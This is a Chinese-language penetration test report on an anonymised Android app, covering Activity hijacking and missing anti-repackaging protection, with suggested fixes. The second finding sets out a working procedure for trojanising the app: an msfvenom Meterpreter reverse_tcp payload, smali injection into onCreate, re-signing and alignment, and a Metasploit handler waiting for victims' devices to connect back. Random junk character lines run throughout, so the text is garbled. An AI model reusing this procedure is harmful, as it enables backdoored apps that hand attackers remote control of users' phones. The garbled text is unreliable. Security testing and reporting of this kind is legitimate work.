Q* L; @2 x. f2 |! f6 D- [
" Z: c& x' z% L h) I; k
# `, s! p# |' L |+ M# Q4 @9 x
表1-2 测试结果
" y& u! M; i, Q8 m. w$ w* S
3 K8 l% v) Z$ F) d" h) T
9 V2 ^0 U, a& q; r3 v8 b% R. t4 @& b ^8 |7 Z- `8 G+ J
& J: S, M Y" T$ ~4 `- j
+ m' K+ q! ~$ I" ?0 J: [4 q
. c0 _4 {; X7 @$ E: T6 c8 H3 {3 I
: k: ]! l+ b: J3 n* X
& h9 f9 n4 l: ]3 ]2 n ' x8 G0 ^/ w" ~7 G6 s; @' r
' l2 }# N2 ^& Q1 S% w: N+ H
2 检测结果
" S7 j( z0 {3 g* o6 ~/ G9 \
( [# a$ X/ Q* P4 v3 C1 d
- }7 ]' S5 V* z3 H" c/ [5 @( |- r Q: S; f! A7 X
; r" w# F& y# G3 u9 t7 g S
$ U& O. w( i$ n0 q! K2 S
2.1 某某某 * `: u3 Z; A) E9 X
9 Q: p2 j( S; |8 D
! x, A: F6 D- _2 Z; |: R
/ F4 e+ b, p) J5 l" J 1 k- l( _- N2 T6 c
( {8 E3 ?- m1 J2 S% c 2.1.1检测目标
& V4 V/ u& ^; r5 C& x4 B {" H7 u* r/ y) r! _' U5 f
6 T1 }' B- B, E8 C5 A3 C9 G6 l1 I- A- Y. y+ B
9 m& r1 l! q$ f
- [; o9 K; [! f z) I7 B2 I
目标地址: 某某某某某某APP
4 d8 D8 S3 h o# B
0 B$ j* R: y/ [- Y+ i0 @- S5 H
. h2 J8 o; n( S/ T+ Z" i
; z$ u. ~0 h# H+ Y$ g) y
6 U) h, _. t4 g; _5 z; I( d" k; t8 K) w+ w- V q5 O' [
2.1.2检测结果
2 f' @" @/ n7 g% n
% D: P( |! w$ l" f- K5 T
0 |0 j# I% Q1 m! A& p$ P
+ v n: Y( e: r : p) k2 w& |5 C- k! g9 s1 X
9 w* L& V; C( P# O0 l. s
2.1.2.1 0 b, L9 o) e- F- n
' U U/ f% s* V: j$ B* K4 N
/ k1 q' _) v! f. X5 w4 |2 t. g; e% _( |# J6 ]3 k2 e
* L6 m6 w3 H8 B2 @
8 g' S9 T; c' j( _5 s) j) m+ b
漏洞链接地址:某某某某某某APP
) C* F' a2 _& n% U' T/ P
& K% b9 S' E9 ?& z+ ^! C' s
: X, v; \' M6 j. w2 H% }
- U1 N5 f5 H0 e6 o, _& V; E3 R
8 x9 d" G) E' B* A( \, O" a, g/ t* x7 B+ }* L3 X5 b# O
6 d2 y& u" a0 D q
9 q' o1 s) Q3 R5 p- J, Z
" }; Q! x# ^2 a& S( \) L+ e$ W8 O$ W$ U2 x3 I# t5 ?' V
& [) d8 `/ {! Q8 F+ |! |
; k% ^1 F4 N$ W, K% j. I3 G 漏洞分析及取证:
5 G, P {8 R( t6 U# a7 P" f3 J, s" u0 Y6 @
- M5 ~- u" o0 x k; _0 ^
+ w# t' M0 R0 |9 L) T
! w( v1 _, I: p$ s: ~' c2 P% o1 `4 w
; c$ z- {. U p- {7 S" f Y
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: # T: X* d' u9 w
- Y+ A6 h- U9 ]9 Y5 N) T
3 C5 L4 O" }5 P" H. c
3 h! p5 g6 I! c. x+ C" `8 b 7 @. |' N0 F" T5 S: p! E7 s
4 V5 a# W9 J3 f) d ! G2 k% O! P( I) J6 W' p! o7 w
& a$ i! T. z, i; v
' ?! n' P/ z2 p) \: z- ]
5 I P( {0 I& _1 W f) X2 T/ r3 T# ~
% p8 _6 H6 L a) _
4 F; Y7 l; }6 L0 I0 a R & M. W/ r. G9 V- r$ L5 N
( f' L$ M+ f( s* X. B
% x! |( G" M2 ]' ]& X
( z+ q) s. \ h) p
$ O- H& s% v! [. i
$ F2 T2 }# n5 P3 \: }$ a. E2 R. v( Y
6 H6 `. g5 C0 X5 q4 S8 @7 f$ B1 ^
; O7 f; D4 |7 `; x& E' I
/ B0 o, S7 N$ R, V
% h6 l( a0 f4 o! ^2 A* ^9 i ( Y! G- Y( a& f! V$ _# B
2 m, \2 V$ G) J: ~( h
4 K5 }# W3 R9 e* i9 V9 i" ]9 v$ g! Y @( @5 F0 t6 O m
5 i# {0 g. d- p- e+ I
/ G6 c4 ^) c' F
& E* ^# y6 z' s x
8 j) y, r* S3 S" {
4 k* S; P# F* d1 U0 }
( f7 t H1 M4 M/ \$ _# L6 _0 Y
7 x G/ A, X5 ~9 D9 P3 U! k2 V( l
( P' @0 a! \: K+ W. H1 N* g2 q
2 ?, P/ d1 L/ G8 w) Z a- j! x
* c- R6 @1 d- j$ A! d: L5 T! j1 g
漏洞危害:高 ' @- _! [4 X6 x; _( i
6 A. G: O; L: j7 Q* B# ~# e# v, E, _, n# N# c
9 F5 Z C6 [ Y" b# z
) t5 u% N' A1 Z8 x1 V+ Z; g" ?
- k3 O# F$ P/ m5 I) n8 K6 r$ L2 x/ I* h8 z4 ]! t1 b
& L: |# n q. ^6 c* t3 H( A# i; A1 p
$ D+ U/ U: q( E$ |" z& w/ h/ F6 H' O+ h# g6 a. K( `
' h4 i/ @* B4 F/ ?: a0 u, O
6 `5 b' ?4 w) u
! Z5 n/ h/ p0 j5 |% ^9 W% x/ P F, M+ h: q9 q
7 W, u# ?4 t+ {7 e- k- H; \
( t" T8 a2 ]4 p) S" \ 严重程度 8 G4 {4 ?9 i4 |2 ^$ `# Q
2 b( T1 ?+ c# M( M1 d1 j4 T+ C 4 t7 }* M/ B) K. t
6 j* G# a# L! e) M6 [( j |
$ r1 R( J2 `: E+ [8 J* J7 p9 v- t/ `6 T' {# V% P
t, @9 h' O+ R& P9 g
& {. p7 \/ n2 `# a2 H
' c$ Y; \# e$ N, S8 F) Y% S4 H4 a3 E
' `% c7 n9 ]+ H: L# W' |4 ` D5 b 高
! x7 {" G3 k- ~) @8 q9 |' s8 q- p0 g2 z$ m8 E1 D* u1 ]
: X; ^- f$ ?0 c5 l) u
) e$ L- u2 X3 i" n' w |
! x' D/ r/ \6 Q0 K8 C& j" s: F2 Q5 Q/ t; H8 K
- L5 I6 F4 K0 s6 E' Q, `4 Z
4 _9 C6 a% r+ d! _6 B9 [* q ; F0 ?6 c: ?+ B3 }' F, k# @
9 I. H* `8 P# a1 R( `
■ 0 [' j6 P) V9 e& n0 a2 I
: j' I# I. S! {6 M0 F; P8 k & T$ J, I- o% D# e& p, ^
0 e) B! F8 \' @% ]! F: K& V
| 2 B& C g4 X$ Z* I6 }7 ^
- J& Q$ h T& H5 G; C + O- v; |4 j. O: r- @2 c, v& Q
" O' I! r3 ^+ ]4 q4 W" I. `0 k 4 ^+ H' ~( w" f* a
m% W# t' ~: J c6 \$ w/ i 中 % x( p0 ]- Z3 H/ O
9 t6 `' E$ a, w6 i
/ C2 ]% _2 j: U T0 P% t$ S h3 Y5 L) l8 Y' ]% v
|
! ?- ]4 e5 S a3 a4 X I1 v" e/ L
: [, T: f- s* @: v) q9 v
& a3 o9 U5 H: W- Z. t8 `+ B P/ q6 `2 f0 o, X! a
V- b+ N3 n* c+ j4 e5 P3 s
# u: T) u0 S' U/ r9 F# g2 o% N
" i. y) Q, U) U# W& E0 x; ^- x2 h) c" H& F" x
. D6 O8 a4 q( G6 E0 c0 A1 R- E: X/ S0 @; D' _1 [3 G
| % k9 H# D- j J3 c' L$ b, \7 f( A$ y
1 z; F/ i! ^: D4 q" K0 \
& g7 L' Z. y+ @
S& i# y/ p1 P& L0 d
1 G. \! b7 S6 f' M7 P* c1 V& m& H# ?9 }% g
低
' i; u( }4 z3 r+ j8 G0 `! o$ [' W- x& J; C& B5 `4 F. |
5 ^$ p2 H/ |! o$ {, t
6 o( z& v1 ?! K7 G6 I3 T
|
% I! ~; p- {) D, g: z# R8 z, V" q) A4 s2 E% f
n% E' |( j. ?( S: S) q: L, D. }6 a1 k7 p1 q
" r w+ ?$ n4 S8 j' F: X
1 ]1 ^2 [3 y8 \# f
. w2 q8 r) a& O% F O" u' N. k& Z9 f7 I" B9 y/ K
* N) q/ E1 u- v- H6 X* S0 S; @# }. \# o# ?7 ]7 Y
| 9 C. p% `! f, P% @) j2 R! p2 K
8 U6 n2 e% \+ E) S x+ \& V" B/ g1 q" c
+ f8 a# `* x( G
& U V" |' a, ]1 l) h1 y
" Y5 u, g7 p# \' q3 Y0 n9 C" q J9 e
: N) H/ W" I' W0 i9 v
, q; b* s( a6 o H" K
1 P7 s! e4 U! B" K" x2 H
) h# S+ F2 P3 L3 T* ~; @2 o9 P( |
6 |3 q5 u4 [# o0 L
9 {! W- T% K* y' P/ o; K
7 `/ _7 c; u; }" a2 \( i / D- }4 \% i5 T
: d* U; p2 f: \ T9 V N N
" \( @) c% c8 m$ g3 y W) k [+ N: f, Q p
2 x. N1 P& X# }& T* U" A0 d6 z% o
( r5 [7 {% Q" c0 g% A 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。
3 Y$ {* [% F+ @# o! R; \
! `2 j5 j) z ?6 G* r1 ?
) k* \+ |3 i5 S7 A; J3 ` M
0 S5 P% Y$ t' h2 o2 y
# n! M+ I: Z2 b& @
' V6 I+ y2 j1 l$ ] . z/ o6 p" t6 m( c
$ ?$ y% J. P9 ^ y9 f% K0 }
9 g% f* C* P# j# i- ^; Y( \$ E) n% X6 V
! }, ~* C! p# P0 V" m4 Q2 P+ Q8 Y$ l% H) Z$ W
- I' `# H# F( Q& m! K
8 d0 v# O0 v/ v9 k; z
! A' {( L5 z8 }' `
& v) R7 B4 A6 W1 y
m, v' E9 ~' L; o* O, {/ Q
% ]9 t: q& \4 S" y% h+ g 2.1.2.2 # Q( Z9 ^3 J4 p* u
4 T9 Z: [1 {0 ^$ C$ l: u6 G
/ ~! m* i) y" Q4 O% E' F6 F' _/ k. R) b3 b- r6 L
: a! S5 z' J6 I: H% f) ?+ K6 l; E
8 k) ~; a5 O! u) P; k* O9 m* M
漏洞链接地址:某某某某某某APP : e0 V# Z: ~: S% b* T, `+ N4 ]9 f* ]
8 @- A6 B0 y! d) a0 ]' |# K1 H
" R% ^( J- w2 [
# E9 `6 D F; ^1 O3 k' Z6 ~, \2 u
! w. D1 u( j6 O z7 p# L0 W
* x8 a1 m E. V- J 漏洞分析及取证: 1 x. v9 V7 g4 v0 h7 [5 l+ ^
& i8 t* \6 e: f, x* o- p1 P
$ u$ H8 g' B) V- e* U4 X
6 P. [4 m9 h6 U: U3 q& L ) \/ X# Z7 ~3 N7 ]6 B8 t
* K4 d# ]& [" p
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: % j6 E, k5 p4 U* F7 L; f
# a( M# m, _7 K3 L8 u0 W& n% p
/ k! p4 p% Q; a% p, J6 [
, V8 ~' l% e" ]. E ( ]1 l# }7 ?' Z2 ?
. h# G5 i V5 X/ T1 l( k
用Metasploit 生成木马 apk / K) R* d# X T. G: f
8 t% P K+ U w/ P; ?. i
3 i5 F# _) j2 R0 J* q
6 Y# X# a+ {/ P* |1 [
W$ P3 S' n& V/ d4 W+ S- r7 S) F7 B
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 2 Y8 s$ Y5 K3 o3 H
2 I3 X# d5 G0 k
# C5 l" [. O. Y! G2 B: a! N
/ P! w8 E- j h4 D& b# Q
9 j5 D" C3 x! t) N3 `9 V9 P+ b( t, R6 k+ a; P1 K
反编译目标apk和木马apk
. T6 _, e' j$ r6 a) R4 {% v* L
* {/ p2 ]0 k" A0 |- C
( Q6 v- ^) z+ o& a2 r8 u
: ~+ V0 x9 t7 a. K+ H
& a/ g' M1 @. a+ {5 X9 n1 H
* R; o" {2 S* t1 }9 n apktool d target.apk
; Y/ R8 Y, G1 k
9 ]4 }0 `4 o: a! M. J- m2 i apktool d cockhorse.apk
5 a( ^4 {# ^8 M' E- F
4 P: p+ A4 @; I* Z7 P
& }: g8 J( B0 P! }' y4 n- I
1 a* I0 i; Z. A( Y4 D2 z7 u/ T( b. s- h & t6 L. F4 w. D7 o: ~
2 i, P2 E0 n- |! l& t 木马 apk 注入目标 apk
1 _, R/ d( r& a- G" s' J! u, m1 T9 |& k! b5 E# R: _7 b2 }
! c! S* k& G' V, _
6 U$ {' F% m9 P4 ~+ `1 x
1 n- {3 E1 y' i, \ |6 Q6 b' ?
" S) Q4 ?" R- l8 \ 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
9 @& W" V( F& T( b3 r6 B' ]
' N; [% N1 A% e& P+ S invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V $ D/ }* Y0 R- Z& L u( }
G3 g. \+ e2 n7 X8 n
: k, ]" S* u& g/ m) E8 D# `3 D$ k; a" q. @9 m2 Q+ k c ]
) R! p; U ^0 Q5 E
: l9 a0 D( t* ^1 I- ?& Z: E 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 ; x- I- w' }4 ], f( G- t
- s6 S: Y! X+ \& a* ]9 o
9 s- ?- K# J* s# @% u% N
9 E) n' _! j! J6 I& ]: s) L $ P8 z. \; |& m. q1 M2 l j6 H
7 X; v: k0 D# g# V$ T* F \* s
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
/ h3 X* T% e/ X6 i3 }) H5 D; ^2 [( {
: E- T8 a y/ E9 i: O1 r0 y
; {; I6 N! e* N$ I7 c
6 ` j! Z! e* a
M- m. u m4 `/ D7 t7 `" X3 k
回编译生成最终 apk
C4 {2 Y% Z5 x- c
1 ?9 U" b4 B# \0 D/ }
0 _+ T# A5 L5 N1 `
$ @& l* y H2 \! o0 v8 y
# u) H4 z0 |9 ?0 f
1 f( O7 y. p: c5 f% P% Z/ h
重新打包
: v/ T. I5 F. G/ U4 ~; |7 P& h! R- X! i: J0 K" W! e8 s* h
( v P3 d' ~/ d- Q+ @! h, T5 s9 ~9 E
; o0 Q! D% b5 p0 F* S4 Y Y. ^2 t: d- {# n
apktool b -o repackage.apk target_app_floder
3 R1 | J4 z5 Q% h' ]5 ?/ P3 h, P5 O$ s' d+ B9 m
: }0 t0 \& V/ K' }( P' N5 d% x' }2 t' x2 n* F& n
; N+ b5 j. `% ~0 L7 w5 G1 p5 k
% X2 [ w% k( q 创建签名文件,有的话可忽略此步骤 5 o3 G4 o# x5 y. i, t* f
7 U9 @: U* Z2 j% i& d
6 S1 z. x' }5 Y* c1 T
" n. O0 A8 o1 t8 X' V) i* ~2 Z ' h/ ~( U3 @/ _7 o3 {- z5 U
$ U% H1 z+ d& A5 \4 I' | keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
# s# E" C d6 s1 h4 d1 o4 M/ k0 i* z! y( i" C& l
5 _$ R& h. B" y6 Q+ P5 \ D
0 X: b q7 A; ]& J+ W8 y N1 F
. A0 i1 c' q* z# f4 ?) t& h" y8 T4 l% f" s" Q. ?" j, M/ T7 V
签名,以下任选其一
+ i% [5 {9 ^ h; |
1 {* a0 |# r7 v* `& e
* r/ y7 V. `; s& b8 _& T
7 t9 w- ]7 r. W2 s- H 4 s- h, S' m. e+ Q$ `( J
' Q q5 S+ ~6 A jarsigner 方式
* L$ b8 e3 k8 T# q( P9 S& n* g* m9 h, X% ?# R$ @
/ b$ B; l. S6 l! q8 N
) G5 }+ |/ ?' p3 c# j
7 u& z E4 t7 k7 l6 N) m& E' I! o" |& M7 Q! P7 L9 j
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 6 T& V0 }4 C# z6 n0 Z
/ I( }. R5 U' K+ F0 W2 {. V* P
% G. O, a* t8 E6 z5 I) t+ K
' O1 l H. B9 g* ^
* m1 |3 q# I7 I" R- I" u. S# v8 r3 z h
apksigner 方式 - i% v) C+ d7 B1 H! z$ c" T
8 n" D! c8 t" s d( `2 k" ]4 n
5 i# F; i9 g( `, W6 G
( z$ r5 J3 v$ ]3 z9 t( m- p2 P) `# `
# q+ T+ G6 o6 B5 W8 `4 s
! @/ l. H {' e+ x: y) O apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
5 G4 T( t7 j) c, M- I$ O+ P* B% \4 J9 c! E
9 I* I% K, Y0 j5 l) C6 A$ @$ w
2 x: ^! g$ H2 O2 E
# ^- ^* e7 i+ \! S* J, N9 |' ?7 p1 p; a
如需要禁用 v2签名 添加选项--v2-signing-enabled false
% o# ]2 I# F$ ^" q1 h U$ s& N+ q: A% G* Y
2 c8 H+ B# ?1 B- E3 V; @
" H) \0 p3 B0 n! p" J
! W8 W+ s! S7 W1 d0 e# G" V+ I) b- c
) s9 [# r+ a6 H. a* f! c 验证,以下任选其一
2 n8 W! M, E6 V5 o O- T6 q6 p2 [: e) J/ j3 O, `8 V- n8 R$ O
1 R# D+ D9 i3 y' X/ G2 n4 [ F% b2 r6 b% j+ P( A
' X( Y Q+ {+ @/ z/ R; f. J
8 o% H! f1 ]1 a9 z( v: ^ jarsigner方式
: q+ x% _$ o' ^/ Q
, }; N* \* d1 b
3 E5 J2 |8 x- K( F% z$ } I1 x, a2 ^% X) A+ |4 }8 H: j6 l8 c: _+ x
* j0 [( w' h' \
4 _ B1 W3 O5 D* E/ C. A& |# F" r
jarsigner -verify repackaged.apk
( Y- {4 k4 ?' c& |
7 [3 p2 M! l9 q, o+ ~! @& ~2 t9 Z
; B( `) K0 C/ v, W. L3 m; f; E& B/ Q" B$ A8 M
9 D4 B+ J% Q. {: E# o: v9 P0 _
# Q. B5 c i' M& h0 ~ apksigner 方式
7 w' u4 p. b1 L' r. `
" A1 [1 t+ P0 P# W
, m' [& V2 C0 ]1 N+ _$ `1 q2 [6 X7 J$ ]" O. h& L% ^
, b W; {5 m% J
7 a$ r, ?1 O9 j9 X8 ?" F* ?
apksigner verify -v --print-certs repackaged.apk
3 L( L6 a9 G9 {. Z
* ^, K& E5 |7 N
' h* Q. L1 i, h+ l# v/ b: z3 ~- A4 n! r/ u* l
( o/ z7 F, K* N2 [# Y+ `- R9 F
/ i* @. x" o0 g0 U' R- D$ c7 M keytool方式 + P, w. L. x0 G2 k j& w
- f6 t Z' _' s) C1 W, r# w
7 b# {/ N, x! n, Q3 U
0 f3 D0 c7 R$ |( f
0 g$ a6 e; Y# \! z% F) p G9 I: M! ^; Z+ u; ^
keytool -printcert -jarfile repackaged.apk
1 P+ N' D4 {, A
5 W+ A/ u! h1 }9 W& u# U6 B
0 q# H( R+ e/ Q8 q2 O1 H; O; B' O, d/ w: P* D" t# P8 ?
2 K5 x/ d' f/ |
, ~* Z% H3 p5 I) l
对齐 7 c; e) k8 _7 k; x( K- u
! q( e" M! F( T6 j9 O1 H* X
K; b3 ~ f6 f1 g: B5 y5 v$ N( k$ p+ A C
" B! d$ R2 L3 j! B2 z. `2 S5 ]
7 Q$ b r; x$ t+ ]" I9 K
字节对齐优化 - |8 K! o) `$ [5 t: K2 m U
8 h4 y6 u$ L& F5 b7 l0 O4 E9 q. l
! v" |+ |* h" J5 v2 {$ M7 _2 z
, ~( b; @( u, ?8 Y1 M% ^ 7 a4 O, i, y" ~( p
G/ \, Q7 Q' n9 y; x zipalign -v 4 repackaged.apk final.apk % _$ W+ N2 V+ h
* F9 }7 G3 |( k
8 O; Z/ f1 @4 y( n& p% A5 C7 s* N2 {1 K; A# @7 f0 i
! U. H2 s& ~9 I" Y6 I; M6 g
( g; l) {4 h: z8 {8 [7 | 检查是否对齐 ( _9 B$ h: _" c6 K* O
7 o& T1 ~: Z4 M' j* j9 f. ~
% E( @1 ~* j2 k |$ w2 j
. S/ ^! h1 s9 m: K1 u$ l 9 i. Y8 K1 a: R2 ]6 X
9 I, J6 H2 G+ T- h/ G' B
zipalign -c -v 4 final.apk
. p$ }5 l( ]: _! G. D$ U. Z$ G& F6 \# W. O" e% K# ~8 U) e. T
- S! F4 ~2 J& Y, S! b. D2 Z
; p& Z# o- q! I: J: g$ _
# c: H: S: F" r' I/ f1 J) r1 {' X9 e# m# ?3 ?9 b
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
B8 w+ V. B `' d+ S
3 @* s% o% E6 i; [# J# K4 j- i9 B( c
k7 P" o9 ?- K% ?6 F4 {( V+ ~ r3 l, }8 h
0 v `" g/ U0 J, \4 z8 ^; j8 |$ }$ z) |
启动Metasploit控制台,配置参数等待上线
, W* W s# f' B. ?8 ]; J. k5 }! I- D% Y* W' ^' p j7 N4 C
* H% h6 G3 G: a" R. {
2 |6 I5 N) V4 o; S+ R! j1 h
. o% p2 I2 X6 M6 q' m/ p: m# Q# V- i ^0 V4 k
在终端依次输入如下命令
! H& ?, \' p `6 l5 _# M0 D) d L/ [1 G) t6 \0 V4 O
3 f/ V' \) r5 c* J& h0 C# w# h3 v" g# N+ l) }8 M9 b
* d9 e/ E- W( O, [
' N2 [5 \; m9 G' K. T
msfconsole + \+ r: X, Q0 M5 G' K$ _6 R+ d4 [
6 K! o0 z! C/ v7 x
2 j/ z5 I7 |9 d! i2 j. n8 N+ L8 d
+ \8 n1 e( }' D2 G2 m* c; ]2 b : }- y8 C; q: e
$ K+ L! c# v8 l' Y8 T Y" U; [ use exploit/multi/handler 8 @9 e8 S x: d. l7 o: a
3 z6 _9 H2 V2 \$ [1 j
0 V! z5 i5 J1 @& w
5 |" A( a5 t) V+ A/ M8 U" ^
2 ?. ~% Z7 h3 D) o' b
* U% \$ {2 K+ l6 R2 n8 [ set PAYLOAD android/meterpreter/reverse_tcp
/ Y/ C: i; ~4 _( G- z( a0 l) ?0 \9 i- p3 _# E% q. N M
, q: p( ^3 \: a1 |! I0 b. Q1 P/ X6 [2 m" s b# G! k
6 D' r/ l6 Q' f. T' [; W& Z8 C* Z' n" ^
set LHOST 192.xxx.xx.xx
$ R, `- c! r( h; T5 D$ l8 [/ H0 N, [ I J) n, o; D I
* R) }, ^, e& Q
% Y {( h2 U( o/ d* s& v' O5 x # X. }" ]; f/ e q9 K! K, j
5 y$ M/ z3 I$ c9 H" \ set LPORT 4444
9 s% \' Q" `7 q: l/ d! ~, O: x6 Z+ L& b7 v7 O
. R; q- }3 d, ], o Y
& ?0 l" R( g4 h / o1 X2 m# P9 |/ G6 t% ?2 |- ?/ G
, ]) A& O. }! A# ]
exploit ; W- ]2 U5 w/ E7 [$ ^7 @2 H8 m
6 W3 R4 S& B/ D- s
6 c# d- O! G" I9 s5 l5 F$ T) Y" b
4 S4 `; L8 k; C0 w+ u h# ^+ ]2 L1 `- e# C3 L# d( F
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: / a' K) M, A* K! |
3 J: F& J1 i U2 s, [6 f3 }$ u/ y
! U( h2 Z8 I' R" ^
; {3 r- n1 \ M/ h4 G
) P/ W0 r: d4 C( t6 l' \$ O; A
, X9 y5 k; P4 O. b7 f# B1 t 漏洞危害:中
3 J9 E8 ]% {' P% p% R8 k* X7 L0 r; w# U; E% C
$ l4 n5 a4 }- }6 u5 N, Q2 O
# u3 g! N# {& `# H/ ]0 X$ H+ h ( \2 a" ^0 Y7 a" u
2 E3 }$ r) P3 w; h3 }
! E) R9 k6 T& m. ], z+ X6 S* i/ j, @
, i5 T0 o' |& B l2 z
( K* m1 b8 L' k4 I) s
* q. M4 Q* P# T* V: f H; B
6 v9 |2 Q. w# M4 g% H" I) [3 d+ [5 d; E; ^2 [' |+ U8 x) [: |
# U* w6 L) m" @7 t
( c7 _% f. V, c* I1 I . Z+ i$ ` D, t5 {4 D' _6 r
8 s* }: v4 p7 P9 X. K
% j* c/ N, ^; W+ Z' Y1 v6 L* G/ y6 J K4 y
严重程度 ) R6 I4 e; e" d/ E" K3 W; ^4 L
8 N6 Z' G. U5 o. }: S) r
% I' t$ X- _ O( \
0 q; t1 ~2 T6 ?: Z$ s- R
|
$ q( j( g( l/ ~' _, x) o" b- ?8 @# r
) k3 P: m0 U# L/ B$ n% F
' o: V1 u0 B; }& _
4 b4 j6 n5 v# W& S9 q& x; ^, x
, H8 O! z# v4 g. } 高 2 l7 m& c8 S7 v' ^, F6 U
d4 N- E. d4 ` [ Y1 t3 W
0 c+ J/ e! j: S9 [" x3 O
0 W9 K! T$ E* J2 ]! ^0 l. n4 R |
, R& m! ]' L+ {& N; G. `
1 B" @ K N/ y& m # ~! l) e, w1 @# w' \* y/ f$ b
& u4 ?0 E. h" M6 V
q1 U$ u! ?: {8 u) x, F' g* w8 T
! |4 x0 W) a$ D8 s ■
7 M" e' ~- W0 }! P. D' L. B9 N& |# `- T. C# ]6 w$ Q
2 v _5 I4 D6 V O3 J9 M6 H2 t4 J$ V- R
|
1 O9 k- U+ k0 p6 }8 ~0 R6 i1 t& w4 L W; n
( `+ @8 `$ H. Q- s, w: C* b5 G8 p1 v u) U
2 T' h& L8 ^' Y/ @& W: {8 H# H0 q+ R
中 * j {8 t+ C0 z% h! ^) E# k
' I* B3 i% G. ^$ I
. \& ]8 d+ w/ ?' ]' L
+ | i$ x6 E0 V, { | ; P2 @$ @; \0 B H7 g2 G+ E
! c ]: E& ]" ?# \
8 [ Z: g2 U* u7 y, \
* v$ j! U1 }3 V( W( y + @- f7 O, v- }6 ]$ |6 _
* h3 ~6 d+ P2 C2 J5 ]( i 8 U! i- [; h3 e8 H9 e
$ _* N4 y# K I. u % \) {- R5 z3 {2 W
. u, C w6 a' g8 ]9 ^6 g4 y ; {9 _- d2 p+ F' I
- b/ c' U2 e2 _
| % ~' @: @ ]0 |
# P) O5 [. N D) Y( E8 V 4 Z; |6 f: D; z5 f, b; [: P
. d9 F! [- a' n5 o! N0 l
. R0 R0 d6 L, g' w% X
6 W5 Y/ G I; ]& S 低 + l* |& N8 A4 h1 Z* k
L( v( q9 _1 g7 ~5 V
' r% u( c1 J- A( x1 l8 M
' B0 \- G" V5 v, t
| ' @, v! S2 H- Z0 T9 c L$ P/ t
- y8 ~; R/ s6 V- \; {1 X
. s% E2 k: |" Q9 c
& @6 } [% B, r- R
4 X' W- X6 _6 [
6 N" m: L: J0 a* Q) Z' t
/ Y- P- o: e6 F$ J2 m H8 b4 P
) ?+ q) r: E/ Y$ N3 M I
. p0 S0 f( ^8 J* G
) x. Q1 j6 v$ O; m; Z. H: U4 l) c
. }0 f+ u# w* c. P9 a' u! j, N- w. o6 a: V
|
: W" v0 c* T; Y
+ S3 I% Z' @# c1 X4 t* J& @% P
0 M+ E7 x, d e& V- g3 V8 |+ |( ~. x! |
/ ]( n0 s' K6 M _! L+ o. W, E5 J7 D+ ~( \" ~4 M. c
" R4 A+ d7 [: K( L: B# |5 q# v9 X' k) B# ^- Z, B2 E- z9 y- F
?% Y' @+ q+ v
# i/ Y7 U7 |6 X! ^5 f( x/ y
+ G6 i) e. `, x7 ?) N5 g" ~" I" f, E7 P! ]; ~
! d6 Y4 G1 a! w7 `/ t6 q
1 A" V- F; m _7 Q
2 r$ A7 ~5 B4 p' d. V3 g+ i" e6 j! s& |1 l
) V* o4 H4 [% r0 e
) r9 |' D0 \8 E6 f
修复方法:
, y' a5 B- `9 r; t6 e9 e
! U0 |, ^: B4 \/ ?& A1 I
" P4 O- P3 t1 V* N6 I
+ n1 [/ |! i0 q" o- d7 d
9 B: l3 j* v- M3 v
$ F8 Z- B% e8 p/ K& s& ]" s 1.在 APP 启动时应做签名校验防止二次打包。
3 _* Q% f0 s/ }) D( C" i
6 z0 G2 d2 @; U. t+ w! { c+ z& b! i 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
& w$ v/ E$ ~6 t; D
- z' G* H) ]% _, O
+ m5 F7 S, g1 ?" r
' Y4 w9 o+ ~8 b/ @& o
- V- u$ B& d# V, w }, M3 L1 s, x
; K( V+ |- w6 l0 ]# z/ Y% P5 q0 D: L
5 p9 L0 u- w! g0 G/ V- [5 w, R1 ^: H- K% E/ f
3 q! Y6 ~7 j1 M0 W
" B0 k1 A- V/ N
- d" U) ]6 M6 n3 @, `' A7 }4 v" S4 D3 `" r& r: P
4 X( q0 v. ?, L* [" G) \) S; V) W9 P* N! H8 \
- w& S; S5 s: [6 J" D
- G9 u. J0 \+ U0 B' Q3 F/ @) j/ m
7 r% M) G1 b9 A9 E: l4 A% d) S1 P% q# [" E" O
2 y8 S, W7 Y8 m1 f
3 ]- G$ b/ v3 M7 p! e& H" n